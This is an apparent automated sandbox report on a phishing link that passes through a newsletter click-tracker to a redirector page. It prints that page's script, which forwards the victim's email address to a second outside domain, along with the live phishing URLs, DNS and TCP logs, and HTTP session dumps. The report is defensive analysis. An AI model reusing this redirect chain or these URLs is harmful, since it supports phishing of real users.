Sample URL: https://link.mail.beehiiv.com/ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCwaH39WupxeBlLns-2FCYgl5f1ctJEhM-3DLmFo_AmeWD5ZsKC-2B3ZheZjnDpbUkAKgKl5WpTuOJCpyDqXRc8K-2FlFlJ4-2Bn1zDfmQE1bOIB5-2BmaBYS52bqAMuImdaBWt-2B7NcvDjHLSjDEqun4F40VGOju6f5eraMm-2BmA2cI4TwN5m-2FdXmsuh3AvB8I3hqCf5Su72C52AB82bXT78OFaGhLdykrKPYdzAmNePbUMkJfeZ1o1xXkpY533PpjggEufwqS96U2lHFtuM0AF0XznjCWvz2-2FAJxdv2yOU4Rja8sE1aVzAzUItssHkUW9tujzTKsHooxa0T1wqU-2BXsNw6IZYMBuNd2XQD3BPavL2FyKwgqOl-2BNlCpAsuRQyxxqbQ0sxmCsvEzI2nw166vYROKCjGmPPQtR1NyNiLpj317EtiqLrlvsktdS8N6bgTfK0t-2FA2HLcAR1clK9xdGWlVkoBfmmnRGIBboAePQ8ToZagwj4auB1PmTKZ9aQMtFdh-2FNJV17VPUH2ibgU2d8MV21fLKU-3D#/?/%23/?/marketing@virtualintelligencebriefing.com
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal56.win@19/2@16/9
                              EGA Information:Failed
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 142.250.105.94, 34.104.35.123, 40.68.123.157, 72.21.81.240, 192.229.211.108, 20.242.39.171, 13.95.31.18, 172.217.215.94
                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, wu.ec.azureedge.net, clientservices.googleapis.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                             • Not all processes were analyzed, report is missing behavior information
                              • Report size getting too big, too many NtOpenFile calls found.
                              • Report size getting too big, too many NtSetInformationFile calls found.
                              • VT rate limit hit for: https://link.mail.beehiiv.com/ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCwaH39WupxeBlLns-2FCYgl5f1ctJEhM-3DLmFo_AmeWD5ZsKC-2B3ZheZjnDpbUkAKgKl5WpTuOJCpyDqXRc8K-2FlFlJ4-2Bn1zDfmQE1bOIB5-2BmaBYS52bqAMuImdaBWt-2B7NcvDjHLSjDEqun4F40VGOju6f5eraMm-2BmA2cI4TwN5m-2FdXmsuh3AvB8I3hqCf5Su72C52AB82bXT78OFaGhLdykrKPYdzAmNePbUMkJfeZ1o1xXkpY533PpjggEufwqS96U2lHFtuM0AF0XznjCWvz2-2FAJxdv2yOU4Rja8sE1aVzAzUItssHkUW9tujzTKsHooxa0T1wqU-2BXsNw6IZYMBuNd2XQD3BPavL2FyKwgqOl-2BNlCpAsuRQyxxqbQ0sxmCsvEzI2nw166vYROKCjGmPPQtR1NyNiLpj317EtiqLrlvsktdS8N6bgTfK0t-2FA2HLcAR1clK9xdGWlVkoBfmmnRGIBboAePQ8ToZagwj4auB1PmTKZ9aQMtFdh-2FNJV17VPUH2ibgU2d8MV21fLKU-3D#/?/%23/?/marketing@virtualintelligencebriefing.com
                              No simulations
                              No context
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:HTML document, ASCII text, with CRLF line terminators
                              Category:downloaded
                              Size (bytes):232
                              Entropy (8bit):4.979386507392717
                              Encrypted:false
                              SSDEEP:6:OK7XnfIuPxm9/UAY8SYfmFr7VddQezMcGh:OEfIuZY/Ur8hfQr7VbHzMbh
                              MD5:DB43D1E8377836DCC645F300AC0C490F
                              SHA1:9694476AA14218476EDC612069E060DCFDD87657
                              SHA-256:9A97CD4AA6A50586ECEB5D58FCBE19E163FA61BE60AA5D65C472C70227E8FB54
                              SHA-512:F138AEA35636B83E3F967227F46DD570F359E23487B889F5FD8F1DA027FC5E08C4AE267E5FFD6DD922A0D069B0C359061007EAF38E84F71478FA4D95ECE4ADF3
                              Malicious:false
                              Reputation:low
                              URL:https://djdhde.mypi.co/sss/?utm_source=capils-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post
                              Preview:....<html>.. <body></body>.. <script>.. var u = window.location.href.lastIndexOf("/") + 1;.. var d = window.location.href.substring(u);.. window.location.replace("https://95mc5.zal0.com/1c59/" + d);.. </script>..</html>
                              No static file info
                              Feb 7, 2024 22:35:42.439505100 CET49755443192.168.2.464.233.185.99
                              Feb 7, 2024 22:35:42.439526081 CET4434975564.233.185.99192.168.2.4
                              Feb 7, 2024 22:35:55.650479078 CET49756443192.168.2.474.125.136.100
                              Feb 7, 2024 22:35:55.650542974 CET4434975674.125.136.100192.168.2.4
                              Feb 7, 2024 22:35:55.650618076 CET49756443192.168.2.474.125.136.100
                              Feb 7, 2024 22:35:55.650934935 CET49756443192.168.2.474.125.136.100
                              Feb 7, 2024 22:35:55.650959969 CET4434975674.125.136.100192.168.2.4
                              Feb 7, 2024 22:35:55.867805004 CET4434975674.125.136.100192.168.2.4
                              Feb 7, 2024 22:35:55.868092060 CET49756443192.168.2.474.125.136.100
                              Feb 7, 2024 22:35:55.868122101 CET4434975674.125.136.100192.168.2.4
                              Feb 7, 2024 22:35:55.868599892 CET4434975674.125.136.100192.168.2.4
                              Feb 7, 2024 22:35:55.868779898 CET49756443192.168.2.474.125.136.100
                              Feb 7, 2024 22:35:55.869201899 CET4434975674.125.136.100192.168.2.4
                              Feb 7, 2024 22:35:55.869265079 CET49756443192.168.2.474.125.136.100
                              Feb 7, 2024 22:35:55.870182037 CET49756443192.168.2.474.125.136.100
                              Feb 7, 2024 22:35:55.870258093 CET4434975674.125.136.100192.168.2.4
                              Feb 7, 2024 22:35:55.870384932 CET49756443192.168.2.474.125.136.100
                              Feb 7, 2024 22:35:55.870413065 CET4434975674.125.136.100192.168.2.4
                              Feb 7, 2024 22:35:55.917886972 CET49756443192.168.2.474.125.136.100
                              Feb 7, 2024 22:35:56.087742090 CET4434975674.125.136.100192.168.2.4
                              Feb 7, 2024 22:35:56.089097977 CET4434975674.125.136.100192.168.2.4
                              Feb 7, 2024 22:35:56.089222908 CET49756443192.168.2.474.125.136.100
                              Feb 7, 2024 22:35:56.089323044 CET49756443192.168.2.474.125.136.100
                              Feb 7, 2024 22:35:56.089360952 CET4434975674.125.136.100192.168.2.4
                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                              Timestamp | Source IP | Dest IP | Checksum | Code | Type
                              Feb 7, 2024 22:34:29.147259951 CET | 192.168.2.4 | 1.1.1.1 | c221 | (Port unreachable) | Destination Unreachable
                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                              Feb 7, 2024 22:34:26.283444881 CET | 192.168.2.4 | 1.1.1.1 | 0x321a | Standard query (0) | clients2.google.com | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:34:26.283595085 CET | 192.168.2.4 | 1.1.1.1 | 0x9823 | Standard query (0) | clients2.google.com | 65 | IN (0x0001) | false
                              Feb 7, 2024 22:34:26.284126043 CET | 192.168.2.4 | 1.1.1.1 | 0xf881 | Standard query (0) | accounts.google.com | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:34:26.284288883 CET | 192.168.2.4 | 1.1.1.1 | 0x7cdb | Standard query (0) | accounts.google.com | 65 | IN (0x0001) | false
                              Feb 7, 2024 22:34:27.994453907 CET | 192.168.2.4 | 1.1.1.1 | 0xc7ea | Standard query (0) | link.mail.beehiiv.com | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:34:27.994723082 CET | 192.168.2.4 | 1.1.1.1 | 0x59e0 | Standard query (0) | link.mail.beehiiv.com | 65 | IN (0x0001) | false
                              Feb 7, 2024 22:34:28.709810972 CET | 192.168.2.4 | 1.1.1.1 | 0x4689 | Standard query (0) | djdhde.mypi.co | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:34:28.710160017 CET | 192.168.2.4 | 1.1.1.1 | 0xd1f4 | Standard query (0) | djdhde.mypi.co | 65 | IN (0x0001) | false
                              Feb 7, 2024 22:34:30.288830996 CET | 192.168.2.4 | 1.1.1.1 | 0xa650 | Standard query (0) | 95mc5.zal0.com | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:34:30.290024042 CET | 192.168.2.4 | 1.1.1.1 | 0x9f67 | Standard query (0) | 95mc5.zal0.com | 65 | IN (0x0001) | false
                              Feb 7, 2024 22:34:30.894057035 CET | 192.168.2.4 | 1.1.1.1 | 0xf6b1 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:34:30.896900892 CET | 192.168.2.4 | 1.1.1.1 | 0xa153 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
                              Feb 7, 2024 22:34:31.468902111 CET | 192.168.2.4 | 1.1.1.1 | 0x8477 | Standard query (0) | a.nel.cloudflare.com | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:34:31.469491959 CET | 192.168.2.4 | 1.1.1.1 | 0xad51 | Standard query (0) | a.nel.cloudflare.com | 65 | IN (0x0001) | false
                              Feb 7, 2024 22:35:55.532114983 CET | 192.168.2.4 | 1.1.1.1 | 0xd444 | Standard query (0) | clients1.google.com | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:35:55.532180071 CET | 192.168.2.4 | 1.1.1.1 | 0x182c | Standard query (0) | clients1.google.com | 65 | IN (0x0001) | false
                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                              Feb 7, 2024 22:34:26.400612116 CET | 1.1.1.1 | 192.168.2.4 | 0x321a | No error (0) | clients2.google.com | clients.l.google.com |  | CNAME (Canonical name) | IN (0x0001) | false
                              Feb 7, 2024 22:34:26.400612116 CET | 1.1.1.1 | 192.168.2.4 | 0x321a | No error (0) | clients.l.google.com |  | 173.194.219.138 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:34:26.400612116 CET | 1.1.1.1 | 192.168.2.4 | 0x321a | No error (0) | clients.l.google.com |  | 173.194.219.139 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:34:26.400612116 CET | 1.1.1.1 | 192.168.2.4 | 0x321a | No error (0) | clients.l.google.com |  | 173.194.219.102 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:34:26.400612116 CET | 1.1.1.1 | 192.168.2.4 | 0x321a | No error (0) | clients.l.google.com |  | 173.194.219.101 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:34:26.400612116 CET | 1.1.1.1 | 192.168.2.4 | 0x321a | No error (0) | clients.l.google.com |  | 173.194.219.113 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:34:26.400612116 CET | 1.1.1.1 | 192.168.2.4 | 0x321a | No error (0) | clients.l.google.com |  | 173.194.219.100 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:34:26.401341915 CET | 1.1.1.1 | 192.168.2.4 | 0x9823 | No error (0) | clients2.google.com | clients.l.google.com |  | CNAME (Canonical name) | IN (0x0001) | false
                              Feb 7, 2024 22:34:26.401770115 CET | 1.1.1.1 | 192.168.2.4 | 0xf881 | No error (0) | accounts.google.com |  | 74.125.138.84 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:34:28.112004995 CET | 1.1.1.1 | 192.168.2.4 | 0xc7ea | No error (0) | link.mail.beehiiv.com |  | 104.18.69.40 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:34:28.112004995 CET | 1.1.1.1 | 192.168.2.4 | 0xc7ea | No error (0) | link.mail.beehiiv.com |  | 104.18.68.40 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:34:28.112869978 CET | 1.1.1.1 | 192.168.2.4 | 0x59e0 | No error (0) | link.mail.beehiiv.com |  |  | 65 | IN (0x0001) | false
                              Feb 7, 2024 22:34:28.897871017 CET | 1.1.1.1 | 192.168.2.4 | 0x4689 | No error (0) | djdhde.mypi.co |  | 23.237.26.135 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:34:30.410244942 CET | 1.1.1.1 | 192.168.2.4 | 0x9f67 | No error (0) | 95mc5.zal0.com |  |  | 65 | IN (0x0001) | false
                              Feb 7, 2024 22:34:30.471610069 CET | 1.1.1.1 | 192.168.2.4 | 0xa650 | No error (0) | 95mc5.zal0.com |  | 104.21.42.31 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:34:30.471610069 CET | 1.1.1.1 | 192.168.2.4 | 0xa650 | No error (0) | 95mc5.zal0.com |  | 172.67.199.185 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:34:31.011517048 CET | 1.1.1.1 | 192.168.2.4 | 0xf6b1 | No error (0) | www.google.com |  | 64.233.185.99 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:34:31.011517048 CET | 1.1.1.1 | 192.168.2.4 | 0xf6b1 | No error (0) | www.google.com |  | 64.233.185.105 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:34:31.011517048 CET | 1.1.1.1 | 192.168.2.4 | 0xf6b1 | No error (0) | www.google.com |  | 64.233.185.103 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:34:31.011517048 CET | 1.1.1.1 | 192.168.2.4 | 0xf6b1 | No error (0) | www.google.com |  | 64.233.185.104 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:34:31.011517048 CET | 1.1.1.1 | 192.168.2.4 | 0xf6b1 | No error (0) | www.google.com |  | 64.233.185.147 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:34:31.011517048 CET | 1.1.1.1 | 192.168.2.4 | 0xf6b1 | No error (0) | www.google.com |  | 64.233.185.106 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:34:31.015466928 CET | 1.1.1.1 | 192.168.2.4 | 0xa153 | No error (0) | www.google.com |  |  | 65 | IN (0x0001) | false
                              Feb 7, 2024 22:34:31.586988926 CET | 1.1.1.1 | 192.168.2.4 | 0x8477 | No error (0) | a.nel.cloudflare.com |  | 35.190.80.1 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:34:44.833103895 CET | 1.1.1.1 | 192.168.2.4 | 0x877 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net |  | CNAME (Canonical name) | IN (0x0001) | false
                              Feb 7, 2024 22:34:44.833103895 CET | 1.1.1.1 | 192.168.2.4 | 0x877 | No error (0) | fp2e7a.wpc.phicdn.net |  | 192.229.211.108 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:34:57.722835064 CET | 1.1.1.1 | 192.168.2.4 | 0xf608 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net |  | CNAME (Canonical name) | IN (0x0001) | false
                              Feb 7, 2024 22:34:57.722835064 CET | 1.1.1.1 | 192.168.2.4 | 0xf608 | No error (0) | fp2e7a.wpc.phicdn.net |  | 192.229.211.108 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:35:18.275068998 CET | 1.1.1.1 | 192.168.2.4 | 0xad3e | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net |  | CNAME (Canonical name) | IN (0x0001) | false
                              Feb 7, 2024 22:35:18.275068998 CET | 1.1.1.1 | 192.168.2.4 | 0xad3e | No error (0) | fp2e7a.wpc.phicdn.net |  | 192.229.211.108 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:35:38.881129980 CET | 1.1.1.1 | 192.168.2.4 | 0x3719 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net |  | CNAME (Canonical name) | IN (0x0001) | false
                              Feb 7, 2024 22:35:38.881129980 CET | 1.1.1.1 | 192.168.2.4 | 0x3719 | No error (0) | fp2e7a.wpc.phicdn.net |  | 192.229.211.108 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:35:55.649836063 CET | 1.1.1.1 | 192.168.2.4 | 0xd444 | No error (0) | clients1.google.com | clients.l.google.com |  | CNAME (Canonical name) | IN (0x0001) | false
                              Feb 7, 2024 22:35:55.649836063 CET | 1.1.1.1 | 192.168.2.4 | 0xd444 | No error (0) | clients.l.google.com |  | 74.125.136.100 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:35:55.649836063 CET | 1.1.1.1 | 192.168.2.4 | 0xd444 | No error (0) | clients.l.google.com |  | 74.125.136.113 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:35:55.649836063 CET | 1.1.1.1 | 192.168.2.4 | 0xd444 | No error (0) | clients.l.google.com |  | 74.125.136.101 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:35:55.649836063 CET | 1.1.1.1 | 192.168.2.4 | 0xd444 | No error (0) | clients.l.google.com |  | 74.125.136.139 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:35:55.649836063 CET | 1.1.1.1 | 192.168.2.4 | 0xd444 | No error (0) | clients.l.google.com |  | 74.125.136.138 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:35:55.649836063 CET | 1.1.1.1 | 192.168.2.4 | 0xd444 | No error (0) | clients.l.google.com |  | 74.125.136.102 | A (IP address) | IN (0x0001) | false
                              Feb 7, 2024 22:35:55.650137901 CET | 1.1.1.1 | 192.168.2.4 | 0x182c | No error (0) | clients1.google.com | clients.l.google.com |  | CNAME (Canonical name) | IN (0x0001) | false
                              • clients2.google.com
                              • accounts.google.com
                              • link.mail.beehiiv.com
                              • djdhde.mypi.co
                              • https:
                                • 95mc5.zal0.com
                              • fs.microsoft.com
                              • a.nel.cloudflare.com
                              • clients1.google.com
                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              0 | 192.168.2.4 | 49731 | 173.194.219.138 | 443 | 3716 | C:\Program Files\Google\Chrome\Application\chrome.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2024-02-07 21:34:26 UTC | 752 | OUT | GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                              Host: clients2.google.com
                              Connection: keep-alive
                              X-Goog-Update-Interactivity: fg
                              X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                              X-Goog-Update-Updater: chromecrx-117.0.5938.132
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: empty
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-07 21:34:26 UTC | 732 | IN | HTTP/1.1 200 OK
                              Content-Security-Policy: script-src 'report-sample' 'nonce-NblJaqbmR3hmE8AIiLtQ9g' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                              Date: Wed, 07 Feb 2024 21:34:26 GMT
                              Content-Type: text/xml; charset=UTF-8
                              X-Daynum: 6246
                              X-Daystart: 48866
                              X-Content-Type-Options: nosniff
                              X-Frame-Options: SAMEORIGIN
                              X-XSS-Protection: 1; mode=block
                              Server: GSE
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Accept-Ranges: none
                              Vary: Accept-Encoding
                              Connection: close
                              Transfer-Encoding: chunked
                              2024-02-07 21:34:26 UTC | 520 | IN | Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="6246" elapsed_seconds="48866"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                              2024-02-07 21:34:26 UTC | 200 | IN | Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
                              2024-02-07 21:34:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              1 | 192.168.2.4 | 49730 | 74.125.138.84 | 443 | 3716 | C:\Program Files\Google\Chrome\Application\chrome.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2024-02-07 21:34:26 UTC | 680 | OUT | POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                              Host: accounts.google.com
                              Connection: keep-alive
                              Content-Length: 1
                              Origin: https://www.google.com
                              Content-Type: application/x-www-form-urlencoded
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: empty
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              Cookie: NID=511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk
                              2024-02-07 21:34:26 UTC | 1 | OUT | Data Raw: 20
                              Data Ascii:
                              2024-02-07 21:34:26 UTC | 1799 | IN | HTTP/1.1 200 OK
                              Content-Type: application/json; charset=utf-8
                              Access-Control-Allow-Origin: https://www.google.com
                              Access-Control-Allow-Credentials: true
                              X-Content-Type-Options: nosniff
                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                              Date: Wed, 07 Feb 2024 21:34:26 GMT
                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                              Content-Security-Policy: script-src 'report-sample' 'nonce-bmjaN4uxOu8Enl03x0poNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                              Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                              Cross-Origin-Opener-Policy: same-origin
                              reporting-endpoints: default="/_/IdentityListAccountsHttp/web-reports?context=eJzjMtDikmLw1JBiOHxtB5Meyy0mIyCe2_2UaSEQH4x7znQUiHf4eLA4pc9gDQBiIR6OR-_617EJ_Lgy6T8TALp_GE8"
                              Server: ESF
                              X-XSS-Protection: 0
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Accept-Ranges: none
                              Vary: Accept-Encoding
                              Connection: close
                              Transfer-Encoding: chunked
                              2024-02-07 21:34:26 UTC | 23 | IN | Data Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                              Data Ascii: 11["gaia.l.a.r",[]]
                              2024-02-07 21:34:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              2 | 192.168.2.4 | 49735 | 104.18.69.40 | 443 | 3716 | C:\Program Files\Google\Chrome\Application\chrome.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2024-02-07 21:34:28 UTC | 1390 | OUT | GET /ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCwaH39WupxeBlLns-2FCYgl5f1ctJEhM-3DLmFo_AmeWD5ZsKC-2B3ZheZjnDpbUkAKgKl5WpTuOJCpyDqXRc8K-2FlFlJ4-2Bn1zDfmQE1bOIB5-2BmaBYS52bqAMuImdaBWt-2B7NcvDjHLSjDEqun4F40VGOju6f5eraMm-2BmA2cI4TwN5m-2FdXmsuh3AvB8I3hqCf5Su72C52AB82bXT78OFaGhLdykrKPYdzAmNePbUMkJfeZ1o1xXkpY533PpjggEufwqS96U2lHFtuM0AF0XznjCWvz2-2FAJxdv2yOU4Rja8sE1aVzAzUItssHkUW9tujzTKsHooxa0T1wqU-2BXsNw6IZYMBuNd2XQD3BPavL2FyKwgqOl-2BNlCpAsuRQyxxqbQ0sxmCsvEzI2nw166vYROKCjGmPPQtR1NyNiLpj317EtiqLrlvsktdS8N6bgTfK0t-2FA2HLcAR1clK9xdGWlVkoBfmmnRGIBboAePQ8ToZagwj4auB1PmTKZ9aQMtFdh-2FNJV17VPUH2ibgU2d8MV21fLKU-3D HTTP/1.1
                              Host: link.mail.beehiiv.com
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              sec-ch-ua-platform: "Windows"
                              Upgrade-Insecure-Requests: 1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: navigate
                              Sec-Fetch-User: ?1
                              Sec-Fetch-Dest: document
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-02-07 21:34:28 UTC | 644 | IN | HTTP/1.1 302 Found
                              Date: Wed, 07 Feb 2024 21:34:28 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Location: https://djdhde.mypi.co/sss?utm_source=capils-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post
                              X-Robots-Tag: noindex, nofollow
                              CF-Cache-Status: DYNAMIC
                              Set-Cookie: __cf_bm=tuRiOP3rBf.7.b50X4whJueIUEBNU_35Ig9_v4X3OUI-1707341668-1-AYVhG5QGfTC3IcFPcC2MoQnAWaljYz/azE/rSglHMOyC8Y52678qSep77SibZpyodJnIrLv3lEYBofGduHJYcaY=; path=/; expires=Wed, 07-Feb-24 22:04:28 GMT; domain=.beehiiv.com; HttpOnly; Secure; SameSite=None
                              Server: cloudflare
                              CF-RAY: 851ec1d3eedb53f9-ATL
                              2024-02-07 21:34:28 UTC | 148 | IN | Data Ascii: 8e<a href="https://djdhde.mypi.co/sss?utm_source=capils-newsletter.beehiiv.com&amp;utm_medium=newsletter&amp;utm_campaign=new-post">Found</a>.
                              2024-02-07 21:34:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
